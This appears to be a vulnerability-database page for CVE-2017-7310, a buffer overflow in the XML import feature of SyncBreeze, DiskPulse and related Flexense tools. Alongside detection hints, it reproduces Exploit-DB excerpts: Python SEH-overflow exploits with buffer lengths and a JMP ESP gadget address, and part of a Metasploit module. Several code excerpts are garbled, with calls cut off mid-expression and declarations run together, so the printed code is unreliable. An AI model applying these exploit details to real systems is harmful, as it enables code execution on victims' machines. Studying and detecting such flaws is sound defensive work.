CVE-2017-7310
Published 2017-03-29
Severity: high (CVSS 3.0 base score 7.8)
Public exploit available
EPSS: 53.65% (98.9th percentile)
A buffer overflow vulnerability in Import Command in SyncBreeze before 10.6, DiskSorter before 10.6, DiskBoss before 8.9, DiskPulse before 10.6, DiskSavvy before 10.6, DupScout before 10.6, and VX Search before 10.6 allows attackers to execute arbitrary code via a crafted XML file containing a long name attribute of a classify element.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flexense | diskboss | — | — |
| flexense | disksorter | — | — |
| flexense | syncbreeze | — | — |
Detection & IOCs (extracted from sources)
Byte sequences:
- \x7A\xB7\x1B\x65
- \x8D\x44\x24\x4C
Detection hints:
- The exploit delivers a specially crafted XML file containing a long 'name' attribute of a 'classify' element to trigger the buffer overflow via the Import Command feature.
- The exploit uses a JMP ESP gadget located in QtGui4.dll at address 0x10015FFE; monitor for ROP/SEH chains referencing this module in affected products.
- The exploit payload uses bad characters \x00\x01\x02\x0a\x0b\x0c\x22\x27 and a stack adjustment of -3500; shellcode in XML imports for these products should be flagged.
- The exploit uses the SEH (Structured Exception Handler) overwrite technique (EXITFUNC=seh); monitor for SEH chain corruption in SyncBreeze, DiskPulse, DupScout, and related processes during XML import.
- The initial junk buffer for SyncBreeze 9.5.16 is 1536 bytes of 'A', and for DiskPulse 10.4.18 it is 1560 bytes; anomalously large 'name' attribute values in XML files imported by these products indicate exploitation attempts.
- The DiskPulse exploit uses a 1560-byte junk buffer; monitor for XML files with oversized classify element name attributes submitted to the DiskPulse Enterprise import functionality.
Caveats:
- The JMP ESP gadget address (0x10015FFE in QtGui4.dll) is version-specific to SyncBreeze Enterprise 9.5.16 on Windows 7 SP1 x86; the offset and return address will differ across other affected product versions and OS configurations.
- The exploit was tested on Windows 7 SP1 x86 only; behavior on other Windows versions or x64 architectures is not confirmed by the exploit author.
- The vulnerability affects multiple products (SyncBreeze, DiskSorter, DiskBoss, DiskPulse, DiskSavvy, DupScout, VX Search), all before version 10.6; each product/version combination may require different offsets and gadget addresses.
CVSS provenance
- NVD, CVSS v3.0: 7.8 HIGH (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 6.8 MEDIUM (AV:N/AC:M/Au:N/C:P/I:P/A:P)
No detection rules found.
Exploit-DB: Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
exploitdb · 2018-02-21 · CVSS 7.8
---
```python
#!/usr/bin/env python
# Exploit Title: Disk Pulse Enterprise v10.4.18 - 'Import Command' Buffer Overflow (SEH)
# Date: 2018-01-22
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.diskpulse.com
# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v10.4.18.exe
# Version: 10.4.16
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2017-7310
import os,struct

#Buffer overflow
junk = "A"*1560

#JMP ESP (QtGui4.dll)
jmpesp= struct.pack('\n'

f = open('Exploit.xml', 'w')
f.write(file)
f.close()
```
Exploit-DB: Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
exploitdb · 2018-01-24
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
      'Description'    => %q(
        This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
        by using the import command option to import a specially crafted xml file.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Daniel Teixeira'
        ],
      'References'     =>
        [
          [ 'CVE', '2017-7310' ],
          [ 'EDB', '41773' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => 'true'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
          'StackAdjustment' => -3500
```
Exploit-DB: Sync Breeze Enterprise 9.5.16 - 'Import Command' Local Buffer Overflow
exploitdb · 2017-03-29
---
```python
#!/usr/bin/env python
# Exploit Title: Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (SEH)
# Date: 2017-03-29
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.5.16.exe
# Version: 9.5.16
# Tested on: Windows 7 SP1 x86
import os,struct

#Buffer overflow
junk = "A" * 1536

#JMP ESP (QtGui4.dll)
jmpesp= struct.pack('\n'

f = open('Exploit.xml', 'w')
f.write(file)
f.close()
```
Metasploit: Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.
Metasploit: Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.
No writeups or analysis indexed.
References
- http://www.diskboss.com/news.html
- http://www.diskpulse.com/news.html
- http://www.disksavvy.com/news.html
- http://www.disksorter.com/news.html
- http://www.dupscout.com/news.html
- http://www.securityfocus.com/bid/97237
- http://www.syncbreeze.com/news.html
- http://www.vxsearch.com/news.html
- https://www.exploit-db.com/exploits/41771/
- https://www.exploit-db.com/exploits/41772/
- https://www.exploit-db.com/exploits/41773/
- https://www.exploit-db.com/exploits/43875/
- https://www.exploit-db.com/exploits/44157/